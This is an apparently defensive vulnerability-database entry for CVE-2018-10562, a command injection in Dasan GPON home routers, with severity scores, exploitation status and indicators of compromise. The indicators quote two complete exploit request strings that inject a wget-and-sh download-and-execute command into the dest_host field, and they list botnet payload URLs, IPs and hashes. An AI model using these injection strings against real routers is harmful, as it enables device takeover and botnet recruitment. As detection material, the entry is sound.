cbcvebase.
CVE-2018-10562
published 2018-05-04

CVE-2018-10562: An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a…

PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-21
Exploited in the wild
EPSS
99.95%
100.0th percentile
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.

Detection & IOCsextracted from sources · hover to see the quote

urlGponForm/diag_Form
path/tmp/gpon80
path/tmp/gpon8080
commandXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
commandXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon8080+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
hash3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d
hash320ed65d955bdde8fb17a35024f7bd978d26c041de1ddcf8a592974f77d82401
hashbe1d722af56ba8a660218a8311c0482c5b2d096ba91485e7d9dfc12a2b8e00b3
ip213.183.53.120
ip46.243.189.101
urlhxxp://46.243.189.101/gang/
domaingpon.party
urlhxxp://hakaiboatnet.pw/m
hash402f7be58a8165c39e95b93334a706ec13fe076a2706d2c32d6360180bba0a74
hash76af2c3ff471916bc247e4c254c9b2affa51edb7e1a18825f36817e8c5921812
hash7bd284f4da09d3a95472a66e0867d778eeb59ed54738f6fb6e417e93c0b65685
hashf693442a7e30876b46fd636d9df25495261be5c1a4f7b13e0fe5afc1b908e774
hash2e66ee1b4414fe2fb17da4372c43a826dd7767c189120eafd427773769302e35
ip185.244.25.168
url185.244.25.168/mips
url185.244.25.168/x86
url185.244.25.168/OwO/Tsunami.mips
url185.244.25.168/x86/mipsel
ip185.244.25.221
url185.244.25.221/bins/Yowai.mips
url185.244.25.221/bins/Yowai.mpsl
url185.244.25.221/bins/Yowai.x86
url185.244.25.221/Yowai.mips
  • Exploit requests target the URI GponForm/diag_Form with POST parameters XWebPageName=diag, diag_action=ping, and shell metacharacters (backtick command injection) in the dest_host parameter.
  • Attackers retrieve command output by revisiting /diag.html after injecting commands; monitor for GET requests to /diag.html following suspicious POST requests to GponForm/diag_Form.
  • Exploit payload drops and executes wget-fetched binaries in /tmp (e.g., /tmp/gpon80, /tmp/gpon8080); monitor for file creation and shell execution in /tmp on GPON router firmware.
  • CVE-2018-10562 is chained with CVE-2018-10561 (authentication bypass); detection should look for unauthenticated POST requests to GponForm/diag_Form.
  • Omni/Mirai variant samples use XOR encryption table key 0xBAADF00D for config string encryption; use this key when decrypting captured botnet config tables.
  • Okane campaign payload server briefly replaced with Cloudflare DNS IP 1.1.1.1 on June 13; monitor for botnet C2 traffic pivoting to 1.1.1.1 as a payload source.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.